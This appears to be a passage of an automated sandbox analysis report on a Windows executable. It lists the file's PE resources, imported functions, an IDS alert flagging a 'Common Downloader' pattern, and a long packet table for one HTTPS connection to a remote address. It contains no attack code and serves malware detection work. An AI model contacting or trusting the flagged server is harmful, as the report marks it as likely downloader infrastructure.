RT_ICON	0x607f0	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 1024, resolution 2835 x 2835 px/m	English	United States	0.23847517730496454
RT_DIALOG	0x60c58	0x100	data	English	United States	0.5234375
RT_DIALOG	0x60d58	0x11c	data	English	United States	0.6091549295774648
RT_DIALOG	0x60e78	0x60	data	English	United States	0.7291666666666666
RT_GROUP_ICON	0x60ed8	0x84	data	English	United States	0.7196969696969697
RT_VERSION	0x60f60	0x214	data	English	United States	0.48872180451127817
RT_MANIFEST	0x61178	0x305	XML 1.0 document, ASCII text, with very long lines (773), with no line terminators	English	United States	0.5614489003880984

Imports

DLL	Import
KERNEL32.dll	GetTickCount, GetFullPathNameA, MoveFileA, SetCurrentDirectoryA, GetFileAttributesA, GetLastError, CreateDirectoryA, SetFileAttributesA, SearchPathA, GetShortPathNameA, CreateFileA, GetFileSize, GetModuleFileNameA, ReadFile, GetCurrentProcess, CopyFileA, ExitProcess, SetEnvironmentVariableA, Sleep, CloseHandle, GetCommandLineA, SetErrorMode, LoadLibraryA, lstrlenA, lstrcpynA, GetDiskFreeSpaceA, GlobalUnlock, GlobalLock, CreateThread, CreateProcessA, RemoveDirectoryA, GetTempFileNameA, lstrcpyA, lstrcatA, GetSystemDirectoryA, GetVersion, GetProcAddress, GlobalAlloc, CompareFileTime, SetFileTime, ExpandEnvironmentStringsA, lstrcmpiA, lstrcmpA, WaitForSingleObject, GlobalFree, GetExitCodeProcess, GetModuleHandleA, GetTempPathA, GetWindowsDirectoryA, LoadLibraryExA, FindFirstFileA, FindNextFileA, DeleteFileA, SetFilePointer, WriteFile, FindClose, WritePrivateProfileStringA, MultiByteToWideChar, MulDiv, GetPrivateProfileStringA, FreeLibrary
USER32.dll	CreateWindowExA, EndDialog, ScreenToClient, GetWindowRect, EnableMenuItem, GetSystemMenu, SetClassLongA, IsWindowEnabled, SetWindowPos, GetSysColor, GetWindowLongA, SetCursor, LoadCursorA, CheckDlgButton, GetMessagePos, LoadBitmapA, CallWindowProcA, IsWindowVisible, CloseClipboard, GetDC, SystemParametersInfoA, RegisterClassA, TrackPopupMenu, AppendMenuA, CreatePopupMenu, GetSystemMetrics, SetDlgItemTextA, GetDlgItemTextA, MessageBoxIndirectA, CharPrevA, DispatchMessageA, PeekMessageA, ReleaseDC, EnableWindow, InvalidateRect, SendMessageA, DefWindowProcA, BeginPaint, GetClientRect, FillRect, DrawTextA, GetClassInfoA, DialogBoxParamA, CharNextA, ExitWindowsEx, DestroyWindow, CreateDialogParamA, SetTimer, GetDlgItem, wsprintfA, SetForegroundWindow, ShowWindow, IsWindow, LoadImageA, SetWindowLongA, SetClipboardData, EmptyClipboard, OpenClipboard, EndPaint, PostQuitMessage, FindWindowExA, SendMessageTimeoutA, SetWindowTextA
GDI32.dll	SelectObject, SetBkMode, CreateFontIndirectA, SetTextColor, DeleteObject, GetDeviceCaps, CreateBrushIndirect, SetBkColor
SHELL32.dll	SHGetSpecialFolderLocation, SHGetPathFromIDListA, SHBrowseForFolderA, SHGetFileInfoA, ShellExecuteA, SHFileOperationA
ADVAPI32.dll	RegCloseKey, RegOpenKeyExA, RegDeleteKeyA, RegDeleteValueA, RegEnumValueA, RegCreateKeyExA, RegSetValueExA, RegQueryValueExA, RegEnumKeyA
COMCTL32.dll	ImageList_Create, ImageList_AddMasked, ImageList_Destroy
ole32.dll	CoCreateInstance, CoTaskMemFree, OleInitialize, OleUninitialize
VERSION.dll	GetFileVersionInfoSizeA, GetFileVersionInfoA, VerQueryValueA

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Network Behavior

Suricata IDS Alerts

Timestamp	Protocol	SID	Signature	Severity	Source Port	Dest Port	Source IP	Dest IP
2024-08-22T16:13:35.638517+0200	TCP	2803270	ETPRO MALWARE Common Downloader Header Pattern UHCa	2	49794	443	192.168.11.20	74.120.9.25

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Aug 22, 2024 16:13:34.993207932 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:34.993226051 CEST	443	49794	74.120.9.25	192.168.11.20
Aug 22, 2024 16:13:34.993382931 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:35.007628918 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:35.007638931 CEST	443	49794	74.120.9.25	192.168.11.20
Aug 22, 2024 16:13:35.432209969 CEST	443	49794	74.120.9.25	192.168.11.20
Aug 22, 2024 16:13:35.432394028 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:35.432394981 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:35.486505032 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:35.486516953 CEST	443	49794	74.120.9.25	192.168.11.20
Aug 22, 2024 16:13:35.486792088 CEST	443	49794	74.120.9.25	192.168.11.20
Aug 22, 2024 16:13:35.487658024 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:35.489938021 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:35.532177925 CEST	443	49794	74.120.9.25	192.168.11.20
Aug 22, 2024 16:13:35.638469934 CEST	443	49794	74.120.9.25	192.168.11.20
Aug 22, 2024 16:13:35.638484001 CEST	443	49794	74.120.9.25	192.168.11.20
Aug 22, 2024 16:13:35.638700008 CEST	443	49794	74.120.9.25	192.168.11.20
Aug 22, 2024 16:13:35.638726950 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:35.638753891 CEST	443	49794	74.120.9.25	192.168.11.20
Aug 22, 2024 16:13:35.638925076 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:35.658487082 CEST	443	49794	74.120.9.25	192.168.11.20
Aug 22, 2024 16:13:35.658628941 CEST	443	49794	74.120.9.25	192.168.11.20
Aug 22, 2024 16:13:35.658828020 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:35.658828020 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:35.658828020 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:35.658839941 CEST	443	49794	74.120.9.25	192.168.11.20
Aug 22, 2024 16:13:35.659075975 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:35.679600954 CEST	443	49794	74.120.9.25	192.168.11.20
Aug 22, 2024 16:13:35.679765940 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:35.698462009 CEST	443	49794	74.120.9.25	192.168.11.20
Aug 22, 2024 16:13:35.698602915 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:35.698602915 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:35.698649883 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:35.708606005 CEST	443	49794	74.120.9.25	192.168.11.20
Aug 22, 2024 16:13:35.708743095 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:35.708743095 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:35.708791971 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:35.728409052 CEST	443	49794	74.120.9.25	192.168.11.20
Aug 22, 2024 16:13:35.728609085 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:35.776087999 CEST	443	49794	74.120.9.25	192.168.11.20
Aug 22, 2024 16:13:35.776256084 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:35.776256084 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:35.780194998 CEST	443	49794	74.120.9.25	192.168.11.20
Aug 22, 2024 16:13:35.780325890 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:35.780433893 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:35.796964884 CEST	443	49794	74.120.9.25	192.168.11.20
Aug 22, 2024 16:13:35.797116995 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:35.797116995 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:35.797116995 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:35.810062885 CEST	443	49794	74.120.9.25	192.168.11.20
Aug 22, 2024 16:13:35.810983896 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:35.816889048 CEST	443	49794	74.120.9.25	192.168.11.20
Aug 22, 2024 16:13:35.817032099 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:35.817096949 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:35.834157944 CEST	443	49794	74.120.9.25	192.168.11.20
Aug 22, 2024 16:13:35.834316015 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:35.834316015 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:35.834496975 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:35.850660086 CEST	443	49794	74.120.9.25	192.168.11.20
Aug 22, 2024 16:13:35.850820065 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:35.850820065 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:35.850820065 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:35.861183882 CEST	443	49794	74.120.9.25	192.168.11.20
Aug 22, 2024 16:13:35.861524105 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:35.861524105 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:35.873023033 CEST	443	49794	74.120.9.25	192.168.11.20
Aug 22, 2024 16:13:35.873233080 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:35.873415947 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:35.880817890 CEST	443	49794	74.120.9.25	192.168.11.20
Aug 22, 2024 16:13:35.881071091 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:35.912594080 CEST	443	49794	74.120.9.25	192.168.11.20
Aug 22, 2024 16:13:35.912801981 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:35.917119980 CEST	443	49794	74.120.9.25	192.168.11.20
Aug 22, 2024 16:13:35.917344093 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:35.934568882 CEST	443	49794	74.120.9.25	192.168.11.20
Aug 22, 2024 16:13:35.935822010 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:35.935822010 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:35.947889090 CEST	443	49794	74.120.9.25	192.168.11.20
Aug 22, 2024 16:13:35.948090076 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:35.963421106 CEST	443	49794	74.120.9.25	192.168.11.20
Aug 22, 2024 16:13:35.963670969 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:35.970560074 CEST	443	49794	74.120.9.25	192.168.11.20
Aug 22, 2024 16:13:35.970762014 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:35.990478992 CEST	443	49794	74.120.9.25	192.168.11.20
Aug 22, 2024 16:13:35.990628004 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:35.990662098 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:35.997210979 CEST	443	49794	74.120.9.25	192.168.11.20
Aug 22, 2024 16:13:35.997399092 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:36.009311914 CEST	443	49794	74.120.9.25	192.168.11.20
Aug 22, 2024 16:13:36.009469986 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:36.009649992 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:36.024353027 CEST	443	49794	74.120.9.25	192.168.11.20
Aug 22, 2024 16:13:36.025335073 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:36.025335073 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:36.025383949 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:36.048805952 CEST	443	49794	74.120.9.25	192.168.11.20
Aug 22, 2024 16:13:36.048974037 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:36.048974037 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:36.053607941 CEST	443	49794	74.120.9.25	192.168.11.20
Aug 22, 2024 16:13:36.053769112 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:36.062186003 CEST	443	49794	74.120.9.25	192.168.11.20
Aug 22, 2024 16:13:36.062388897 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:36.062568903 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:36.084007025 CEST	443	49794	74.120.9.25	192.168.11.20
Aug 22, 2024 16:13:36.084180117 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:36.099014044 CEST	443	49794	74.120.9.25	192.168.11.20
Aug 22, 2024 16:13:36.099143982 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:36.099143982 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:36.099359035 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:36.099370003 CEST	443	49794	74.120.9.25	192.168.11.20
Aug 22, 2024 16:13:36.099504948 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:36.106857061 CEST	443	49794	74.120.9.25	192.168.11.20
Aug 22, 2024 16:13:36.107044935 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:36.107258081 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:36.115308046 CEST	443	49794	74.120.9.25	192.168.11.20
Aug 22, 2024 16:13:36.115442991 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:36.130737066 CEST	443	49794	74.120.9.25	192.168.11.20
Aug 22, 2024 16:13:36.130887985 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:36.130939007 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:36.130948067 CEST	443	49794	74.120.9.25	192.168.11.20
Aug 22, 2024 16:13:36.131103992 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:36.147238970 CEST	443	49794	74.120.9.25	192.168.11.20
Aug 22, 2024 16:13:36.147567034 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:36.147567034 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:36.147577047 CEST	443	49794	74.120.9.25	192.168.11.20
Aug 22, 2024 16:13:36.147712946 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:36.162190914 CEST	443	49794	74.120.9.25	192.168.11.20
Aug 22, 2024 16:13:36.162359953 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:36.162437916 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:36.162447929 CEST	443	49794	74.120.9.25	192.168.11.20
Aug 22, 2024 16:13:36.162604094 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:36.189130068 CEST	443	49794	74.120.9.25	192.168.11.20
Aug 22, 2024 16:13:36.189250946 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:36.189435005 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:36.204268932 CEST	443	49794	74.120.9.25	192.168.11.20
Aug 22, 2024 16:13:36.204595089 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:36.204595089 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:36.204608917 CEST	443	49794	74.120.9.25	192.168.11.20
Aug 22, 2024 16:13:36.204806089 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:36.218311071 CEST	443	49794	74.120.9.25	192.168.11.20
Aug 22, 2024 16:13:36.218467951 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:36.218683004 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:36.225287914 CEST	443	49794	74.120.9.25	192.168.11.20
Aug 22, 2024 16:13:36.225449085 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:36.233514071 CEST	443	49794	74.120.9.25	192.168.11.20
Aug 22, 2024 16:13:36.233731985 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:36.233793020 CEST	443	49794	74.120.9.25	192.168.11.20
Aug 22, 2024 16:13:36.233992100 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:36.246220112 CEST	443	49794	74.120.9.25	192.168.11.20
Aug 22, 2024 16:13:36.246381998 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:36.246381998 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:36.246476889 CEST	443	49794	74.120.9.25	192.168.11.20
Aug 22, 2024 16:13:36.246676922 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:36.265737057 CEST	443	49794	74.120.9.25	192.168.11.20
Aug 22, 2024 16:13:36.265940905 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:36.265942097 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:36.266043901 CEST	443	49794	74.120.9.25	192.168.11.20
Aug 22, 2024 16:13:36.266247988 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:36.274689913 CEST	443	49794	74.120.9.25	192.168.11.20
Aug 22, 2024 16:13:36.274883986 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:36.290709019 CEST	443	49794	74.120.9.25	192.168.11.20
Aug 22, 2024 16:13:36.290884972 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:36.290932894 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:36.290956020 CEST	443	49794	74.120.9.25	192.168.11.20
Aug 22, 2024 16:13:36.291100025 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:36.304085016 CEST	443	49794	74.120.9.25	192.168.11.20
Aug 22, 2024 16:13:36.304234028 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:36.304234028 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:36.304280996 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:36.304291964 CEST	443	49794	74.120.9.25	192.168.11.20
Aug 22, 2024 16:13:36.304497004 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:36.330885887 CEST	443	49794	74.120.9.25	192.168.11.20
Aug 22, 2024 16:13:36.331053972 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:36.331053972 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:36.331075907 CEST	443	49794	74.120.9.25	192.168.11.20
Aug 22, 2024 16:13:36.331351995 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:36.346522093 CEST	443	49794	74.120.9.25	192.168.11.20
Aug 22, 2024 16:13:36.346693993 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:36.346693993 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:36.346719980 CEST	443	49794	74.120.9.25	192.168.11.20
Aug 22, 2024 16:13:36.346906900 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:36.361718893 CEST	443	49794	74.120.9.25	192.168.11.20
Aug 22, 2024 16:13:36.361890078 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:36.361965895 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:36.370528936 CEST	443	49794	74.120.9.25	192.168.11.20
Aug 22, 2024 16:13:36.370755911 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:36.374167919 CEST	443	49794	74.120.9.25	192.168.11.20
Aug 22, 2024 16:13:36.374474049 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:36.374474049 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:36.388792992 CEST	443	49794	74.120.9.25	192.168.11.20
Aug 22, 2024 16:13:36.388916969 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:36.388917923 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:36.388966084 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:36.396150112 CEST	443	49794	74.120.9.25	192.168.11.20
Aug 22, 2024 16:13:36.396415949 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:36.405456066 CEST	443	49794	74.120.9.25	192.168.11.20
Aug 22, 2024 16:13:36.405620098 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:36.405635118 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:36.405643940 CEST	443	49794	74.120.9.25	192.168.11.20
Aug 22, 2024 16:13:36.405869961 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:36.422444105 CEST	443	49794	74.120.9.25	192.168.11.20
Aug 22, 2024 16:13:36.422681093 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:36.422681093 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:36.429733038 CEST	443	49794	74.120.9.25	192.168.11.20
Aug 22, 2024 16:13:36.429981947 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:36.436408043 CEST	443	49794	74.120.9.25	192.168.11.20
Aug 22, 2024 16:13:36.436573029 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:36.436650038 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:36.436655045 CEST	443	49794	74.120.9.25	192.168.11.20
Aug 22, 2024 16:13:36.436816931 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:36.453195095 CEST	443	49794	74.120.9.25	192.168.11.20
Aug 22, 2024 16:13:36.453394890 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:36.453609943 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:36.460910082 CEST	443	49794	74.120.9.25	192.168.11.20
Aug 22, 2024 16:13:36.461050987 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:36.468986988 CEST	443	49794	74.120.9.25	192.168.11.20
Aug 22, 2024 16:13:36.469155073 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:36.469253063 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:36.488437891 CEST	443	49794	74.120.9.25	192.168.11.20
Aug 22, 2024 16:13:36.488639116 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:36.488646030 CEST	443	49794	74.120.9.25	192.168.11.20
Aug 22, 2024 16:13:36.488852978 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:36.501343966 CEST	443	49794	74.120.9.25	192.168.11.20
Aug 22, 2024 16:13:36.501570940 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:36.501578093 CEST	443	49794	74.120.9.25	192.168.11.20
Aug 22, 2024 16:13:36.501737118 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:36.511362076 CEST	443	49794	74.120.9.25	192.168.11.20
Aug 22, 2024 16:13:36.511703968 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:36.511703968 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:36.517663002 CEST	443	49794	74.120.9.25	192.168.11.20
Aug 22, 2024 16:13:36.517818928 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:36.530517101 CEST	443	49794	74.120.9.25	192.168.11.20
Aug 22, 2024 16:13:36.530832052 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:36.530832052 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:36.530842066 CEST	443	49794	74.120.9.25	192.168.11.20
Aug 22, 2024 16:13:36.531084061 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:36.537297010 CEST	443	49794	74.120.9.25	192.168.11.20
Aug 22, 2024 16:13:36.537455082 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:36.537570953 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:36.544090033 CEST	443	49794	74.120.9.25	192.168.11.20
Aug 22, 2024 16:13:36.544332027 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:36.550976038 CEST	443	49794	74.120.9.25	192.168.11.20
Aug 22, 2024 16:13:36.551668882 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:36.551961899 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:36.569762945 CEST	443	49794	74.120.9.25	192.168.11.20
Aug 22, 2024 16:13:36.569906950 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:36.569976091 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:36.569976091 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:36.569986105 CEST	443	49794	74.120.9.25	192.168.11.20
Aug 22, 2024 16:13:36.570142031 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:36.589256048 CEST	443	49794	74.120.9.25	192.168.11.20
Aug 22, 2024 16:13:36.589476109 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:36.589476109 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:36.589485884 CEST	443	49794	74.120.9.25	192.168.11.20
Aug 22, 2024 16:13:36.589705944 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:36.600203991 CEST	443	49794	74.120.9.25	192.168.11.20
Aug 22, 2024 16:13:36.600416899 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:36.606868029 CEST	443	49794	74.120.9.25	192.168.11.20
Aug 22, 2024 16:13:36.607032061 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:36.619981050 CEST	443	49794	74.120.9.25	192.168.11.20
Aug 22, 2024 16:13:36.620182037 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:36.620204926 CEST	443	49794	74.120.9.25	192.168.11.20
Aug 22, 2024 16:13:36.620347977 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:36.631725073 CEST	443	49794	74.120.9.25	192.168.11.20
Aug 22, 2024 16:13:36.631887913 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:36.632052898 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:36.638243914 CEST	443	49794	74.120.9.25	192.168.11.20
Aug 22, 2024 16:13:36.638427019 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:36.645109892 CEST	443	49794	74.120.9.25	192.168.11.20
Aug 22, 2024 16:13:36.645278931 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:36.645278931 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:36.653898954 CEST	443	49794	74.120.9.25	192.168.11.20
Aug 22, 2024 16:13:36.654067039 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:36.654067039 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:36.661067963 CEST	443	49794	74.120.9.25	192.168.11.20
Aug 22, 2024 16:13:36.661256075 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:36.666816950 CEST	443	49794	74.120.9.25	192.168.11.20
Aug 22, 2024 16:13:36.667021036 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:36.667186022 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:36.671230078 CEST	443	49794	74.120.9.25	192.168.11.20
Aug 22, 2024 16:13:36.671447992 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:36.684542894 CEST	443	49794	74.120.9.25	192.168.11.20
Aug 22, 2024 16:13:36.684751987 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:36.684760094 CEST	443	49794	74.120.9.25	192.168.11.20
Aug 22, 2024 16:13:36.684917927 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:36.702287912 CEST	443	49794	74.120.9.25	192.168.11.20
Aug 22, 2024 16:13:36.702454090 CEST	49794	443	192.168.11.20	74.120.9.25
Aug 22, 2024 16:13:36.702454090 CEST	49794	443	192.168.11.20	74.120.9.25
